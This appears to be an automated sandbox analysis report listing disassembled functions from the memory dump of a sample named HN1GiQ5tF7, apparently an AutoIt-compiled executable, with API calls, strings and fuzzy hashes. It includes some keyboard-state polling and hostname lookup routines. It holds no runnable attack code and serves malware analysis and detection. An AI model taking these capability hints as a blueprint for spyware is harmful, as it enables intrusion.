Opcode Fuzzy Hash: b7fe3f5fe255b720847a36e427b46885690c94e8e6e8582f67e14aa538bc514a
Instruction Fuzzy Hash: 8241E776C10229ABDB11EBA4DC95DEEB7BABF04310F044129F902B7261EA709E45CF95

Function 006767E9 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006767FD
__swprintf.LIBCMT ref: 0067680A

Part of subcall function 0065172B: __woutput_l.LIBCMT ref: 00651784

FindResourceW.KERNEL32(?,?,0000000E), ref: 00676834
LoadResource.KERNEL32(?,00000000), ref: 00676840
LockResource.KERNEL32(00000000), ref: 0067684D
FindResourceW.KERNEL32(?,?,00000003), ref: 0067686D
LoadResource.KERNEL32(?,00000000), ref: 0067687F
SizeofResource.KERNEL32(?,00000000), ref: 0067688E
LockResource.KERNEL32(?), ref: 0067689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 006768F9

Strings

5n, xrefs: 006767F6

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID: 5n
API String ID: 1433390588-3960085109
Opcode ID: 13a2c77b0c0580a16f612fe7837760e3f4b42cb8c1dc376465d22ec842934442
Instruction ID: 110895009966ec386e9c6d1bf2b4fdb8c80831e77d68797867eef8504dfd8aca
Opcode Fuzzy Hash: 13a2c77b0c0580a16f612fe7837760e3f4b42cb8c1dc376465d22ec842934442
Instruction Fuzzy Hash: 0831B0B190065AAFDB109F61DD44EBF7BAAEF08341F008525F916EA240E730DA51DB71

Function 006725B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,006A36F4,00000010,?,Bad directive syntax error,006CDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 006725D6
LoadStringW.USER32(00000000,?,006A36F4,00000010), ref: 006725DD
_wprintf.LIBCMT ref: 00672610
__swprintf.LIBCMT ref: 00672632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 006726A1

Strings

Error: , xrefs: 0067266F
Line %d:, xrefs: 0067262C
%s (%d) : ==> %s.: %s %s, xrefs: 0067260B
., xrefs: 00672687
Line %d (File "%s"):, xrefs: 00672647

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: e8529bda2fbbc8a9d222b3271e98bc278162760d2d1bdd544fdc6305df2b465e
Instruction ID: 521a980cd9fbca3eda51403c6d429eebf14516c35c43b2deb9563bc64c79bcac
Opcode Fuzzy Hash: e8529bda2fbbc8a9d222b3271e98bc278162760d2d1bdd544fdc6305df2b465e
Instruction Fuzzy Hash: 8E217C3180022AAFCF11AB90CC4AEEE7B7ABF18304F00445AF516671A2EA71A658DB55

Function 00677AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00677B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00677B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00677B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00677B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00677B8C

Strings

status PlayMe mode, xrefs: 00677B3D
open , xrefs: 00677AF1
play PlayMe, xrefs: 00677B87
play PlayMe wait, xrefs: 00677B76
close PlayMe, xrefs: 00677B53, 00677B80
alias PlayMe, xrefs: 00677B1B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: SendString
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 890592661-1007645807
Opcode ID: 3c562a0cd16aa3478eab862a54a00f81c2f71a08c549482cbfc31227280563ed
Instruction ID: 20ebacb010e235103186fb56d7a2ebf47d8bbe47d37e31c3d23868c0101370fa
Opcode Fuzzy Hash: 3c562a0cd16aa3478eab862a54a00f81c2f71a08c549482cbfc31227280563ed
Instruction Fuzzy Hash: F811C4A06503A979DB20B7A2CC4ADFF7BBEEB91F10F000419B415A71C1EE700A45CAF4

Function 0067778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00677794

Part of subcall function 0064DC38: timeGetTime.WINMM(?,75A4B400,006A58AB), ref: 0064DC3C

Sleep.KERNEL32(0000000A), ref: 006777C0
EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 006777E4
FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00677806
SetActiveWindow.USER32 ref: 00677825
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00677833
SendMessageW.USER32(00000010,00000000,00000000), ref: 00677852
Sleep.KERNEL32(000000FA), ref: 0067785D
IsWindow.USER32 ref: 00677869
EndDialog.USER32(00000000), ref: 0067787A

Strings

BUTTON, xrefs: 006777F8

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 93c503799be79609195fac45ea5856e85836ce5154f29d23c898c2a2063abbb8
Instruction ID: 418f85abbe597cb39102a60441f9db7957e48d0426f6c9f7f116f5a7a800b4e4
Opcode Fuzzy Hash: 93c503799be79609195fac45ea5856e85836ce5154f29d23c898c2a2063abbb8
Instruction Fuzzy Hash: 94214DF2214245AFE7159B30EC89A763F6BFB44348F00B138F51A863A2EB719D41DA25

Function 006802EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON

Download Yara Rule

APIs

Part of subcall function 0063936C: __swprintf.LIBCMT ref: 006393AB
Part of subcall function 0063936C: __itow.LIBCMT ref: 006393DF

CoInitialize.OLE32(00000000), ref: 0068034B
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006803DE
SHGetDesktopFolder.SHELL32(?), ref: 006803F2
CoCreateInstance.OLE32(006BDA8C,00000000,00000001,006E3CF8,?), ref: 0068043E
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006804AD
CoTaskMemFree.OLE32(?,?), ref: 00680505
_memset.LIBCMT ref: 00680542
SHBrowseForFolderW.SHELL32(?), ref: 0068057E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006805A1
CoTaskMemFree.OLE32(00000000), ref: 006805A8
CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006805DF
CoUninitialize.OLE32(00000001,00000000), ref: 006805E1

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
String ID:
API String ID: 1246142700-0
Opcode ID: 80cb0d0bbd6693256da3cd84f6d8ec0a732b126d3592b0f20c71bab4ec64b0c8
Instruction ID: 4261ddeeb85bfc9e57d656d62f12c0210f05cd1720df6daa26c2be96ff17c701
Opcode Fuzzy Hash: 80cb0d0bbd6693256da3cd84f6d8ec0a732b126d3592b0f20c71bab4ec64b0c8
Instruction Fuzzy Hash: F6B1E974A00109AFDB44DFA4C988DAEBBBAEF48314F148569F905EB251DB30EE45CF54

Function 00672E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00672ED6
SetKeyboardState.USER32(?), ref: 00672F41
GetAsyncKeyState.USER32(000000A0), ref: 00672F61
GetKeyState.USER32(000000A0), ref: 00672F78
GetAsyncKeyState.USER32(000000A1), ref: 00672FA7
GetKeyState.USER32(000000A1), ref: 00672FB8
GetAsyncKeyState.USER32(00000011), ref: 00672FE4
GetKeyState.USER32(00000011), ref: 00672FF2
GetAsyncKeyState.USER32(00000012), ref: 0067301B
GetKeyState.USER32(00000012), ref: 00673029
GetAsyncKeyState.USER32(0000005B), ref: 00673052
GetKeyState.USER32(0000005B), ref: 00673060

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: b3a74025e5849a718d657d2fe5e5b16f27755b0b5dff32c45af10ad528e0042a
Instruction ID: cc3d162d3771f3617df1144ec6f8a708b844fc708093c63c62f8304f39ed1fb9
Opcode Fuzzy Hash: b3a74025e5849a718d657d2fe5e5b16f27755b0b5dff32c45af10ad528e0042a
Instruction Fuzzy Hash: A8512A6090479969FB35EBB48811BEABFF65F11340F08C58DC5CA5A3C2DB549B8CCB62

Function 0066ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 0066ED1E
GetWindowRect.USER32(00000000,?), ref: 0066ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0066ED8E
GetDlgItem.USER32(?,00000002), ref: 0066ED99
GetWindowRect.USER32(00000000,?), ref: 0066EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0066EE01
GetDlgItem.USER32(?,000003E9), ref: 0066EE0F
GetWindowRect.USER32(00000000,?), ref: 0066EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0066EE63
GetDlgItem.USER32(?,000003EA), ref: 0066EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0066EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 0066EE9B

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 641b857ef0f8274cb2c7747ed7a8d723237ba411000788f87d30230c111b1a1e
Instruction ID: 13f82e38e7952b2da722f2e6c0fa54b954d8ad1f6ac5c3084a573b929d65e832
Opcode Fuzzy Hash: 641b857ef0f8274cb2c7747ed7a8d723237ba411000788f87d30230c111b1a1e
Instruction Fuzzy Hash: A25121B5B00205AFDB18CF69DD95AAEBBBAFB88700F14822DF519D7290E7719D448B10

Function 0064B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0064B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0064B759,?,00000000,?,?,?,?,0064B72B,00000000,?), ref: 0064BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0064B72B), ref: 0064B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,0064B72B,00000000,?,?,0064B2EF,?,?), ref: 0064B88D
DestroyAcceleratorTable.USER32(00000000), ref: 006AD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0064B72B,00000000,?,?,0064B2EF,?,?), ref: 006AD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0064B72B,00000000,?,?,0064B2EF,?,?), ref: 006AD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0064B72B,00000000,?,?,0064B2EF,?,?), ref: 006AD90A
DeleteObject.GDI32(00000000), ref: 006AD91C

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 731e99bd7f24b39bd49000d62b1441a0a2420d40c51012201508ea4150817b68
Instruction ID: 834322ef53cfa2ca12bccda6256bc9608da5df7ead31e14b84d03b8667c62a47
Opcode Fuzzy Hash: 731e99bd7f24b39bd49000d62b1441a0a2420d40c51012201508ea4150817b68
Instruction Fuzzy Hash: 82617930500601DFDB25AF19D988BB6B7B7FF96365F14252DE0468AA70CB70E891CF80

Function 0064B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 0064B526: GetWindowLongW.USER32(?,000000EB), ref: 0064B537

GetSysColor.USER32(0000000F), ref: 0064B438

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 5c11dffe743adebdfefa3f809b1630e20b65dfec96cecda4bc9f2fc992bba83a
Instruction ID: 3184cc6160c46d97778f366a11b39e8c837109a2b32539827d0916f17ad7efa6
Opcode Fuzzy Hash: 5c11dffe743adebdfefa3f809b1630e20b65dfec96cecda4bc9f2fc992bba83a
Instruction Fuzzy Hash: 0241A175000150ABDB246F28D889BF93BA7AB06731F145361FD658E2EAD730CD82DB61

Function 0067690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00676923
_wcscpy.LIBCMT ref: 00676934
__wsplitpath.LIBCMT ref: 00676958
__wsplitpath.LIBCMT ref: 00676979
_wcscpy.LIBCMT ref: 0067699B
_wcscpy.LIBCMT ref: 006769B9
_wcscpy.LIBCMT ref: 006769C7
_wcscat.LIBCMT ref: 006769D6
_wcscat.LIBCMT ref: 00676A2B
_wcscat.LIBCMT ref: 00676A61
_wcscat.LIBCMT ref: 00676A73

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: b961a25d15c26b34248db72a6e6967842017b2e6efdcaddd2279aec1ce85629b
Instruction ID: 3b7c2f595c87e3978c99fd27627d5fe8314589f9abc3603c9edcf5d1f3d43899
Opcode Fuzzy Hash: b961a25d15c26b34248db72a6e6967842017b2e6efdcaddd2279aec1ce85629b
Instruction Fuzzy Hash: 65411E7684511CAEDFA1EB94CC45DDF73BEEF44310F0041EABA59A2051EA30ABE98F54

Function 0067D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(006CDC00,006CDC00,006CDC00), ref: 0067D7CE
GetDriveTypeW.KERNEL32(?,006E3A70,00000061), ref: 0067D898
_wcscpy.LIBCMT ref: 0067D8C2

Strings

all, xrefs: 0067D7D4
network, xrefs: 0067D82C
removable, xrefs: 0067D800
cdrom, xrefs: 0067D7EA
unknown, xrefs: 0067D859
fixed, xrefs: 0067D816
ramdisk, xrefs: 0067D842

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 19428eae948bf91345b4d467d68f4280c4c5261e3f7b669a75696ccbbc8f49bc
Instruction ID: 7a7315a0294d5094813438876ace6d2a3c628b5caf3b1a9ec53384fbe384dfb0
Opcode Fuzzy Hash: 19428eae948bf91345b4d467d68f4280c4c5261e3f7b669a75696ccbbc8f49bc
Instruction Fuzzy Hash: 1A517F35504340AFC740EF14D891AAEB7B7EF94314F10C92DF5AA572A2EB31DE45CA86

Function 0063936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 006393AB
__itow.LIBCMT ref: 006393DF

Part of subcall function 00651557: _xtow@16.LIBCMT ref: 00651578

Strings

True, xrefs: 006A4C8C
False, xrefs: 006A4C93
0x%p, xrefs: 006A4CAD
%.15g, xrefs: 006393A5

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: edaaca70c44785c4f6487205025ef61f97e168d1c27b2dba358956379235f834
Instruction ID: 98f68636d2e6c62634eb559e2712f038ccb0563514b99203b8e8db6ed916a7dd
Opcode Fuzzy Hash: edaaca70c44785c4f6487205025ef61f97e168d1c27b2dba358956379235f834
Instruction Fuzzy Hash: 6F41D6715042049BEB64EB78DD41EAA73F6EF89310F20446EE54AD72C2EEB19D42CF61

Function 0069A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0069A259
CreateCompatibleDC.GDI32(00000000), ref: 0069A260
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0069A273
SelectObject.GDI32(00000000,00000000), ref: 0069A27B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0069A286
DeleteDC.GDI32(00000000), ref: 0069A28F
GetWindowLongW.USER32(?,000000EC), ref: 0069A299
SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0069A2AD
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0069A2B9

Strings

static, xrefs: 0069A1F1

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: c3a42b831baebf1644cc459c4c623da773a6086fe8815458a61d7215348f78d2
Instruction ID: 37f721b8d3d17422c6594393c96cc75b8df5f6a50497b62a50a112c3e7a164e3
Opcode Fuzzy Hash: c3a42b831baebf1644cc459c4c623da773a6086fe8815458a61d7215348f78d2
Instruction Fuzzy Hash: 97318D71100215BBDF119FA4DC49FEA3BAEFF1A360F150324FA19AA1A0D732D851DBA5

Function 00676F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00676F1D
gethostname.WSOCK32(?,00000100), ref: 00676F37
gethostbyname.WSOCK32(?), ref: 00676F44
_wcscpy.LIBCMT ref: 00676F6C
inet_ntoa.WSOCK32(?), ref: 00676F8A
_strcat.LIBCMT ref: 00676F98
_wcscpy.LIBCMT ref: 00676FAF
WSACleanup.WSOCK32 ref: 00676FBD
_wcscpy.LIBCMT ref: 00676FCB

Strings

0.0.0.0, xrefs: 00676F66

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006BD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269632113.00000000006EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1269646258.00000000006F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_630000_HN1GiQ5tF7.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 238a2237a363655ebb0a1b76ae0d41c1a3d1fbbd54ed79efe8d806b6cb36692e
Instruction ID: 8e2d860dc713db5e1614f832aec483b86a996c3fd425c88d719a58c859c7f5cf
Opcode Fuzzy Hash: 238a2237a363655ebb0a1b76ae0d41c1a3d1fbbd54ed79efe8d806b6cb36692e
Instruction Fuzzy Hash: 7411E4B1504215ABDB24AB70EC0AEEA77BFEF40711F0042B9F409A6181FF74DAC58B54

Function 0065500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00655047

Part of subcall function 00657C0E: __getptd_noexit.LIBCMT ref: 00657C0E

__gmtime64_s.LIBCMT ref: 006550E0
__gmtime64_s.LIBCMT ref: 00655116
__gmtime64_s.LIBCMT ref: 00655133
__allrem.LIBCMT ref: 00655189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006551A5
__allrem.LIBCMT ref: 006551BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006551DA
__allrem.LIBCMT ref: 006551F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0065520F
__invoke_watson.LIBCMT ref: 00655280

Memory Dump Source

Source File: 00000000.00000002.1269549003.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true

Associated: 00000000.00000002.1269531366.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
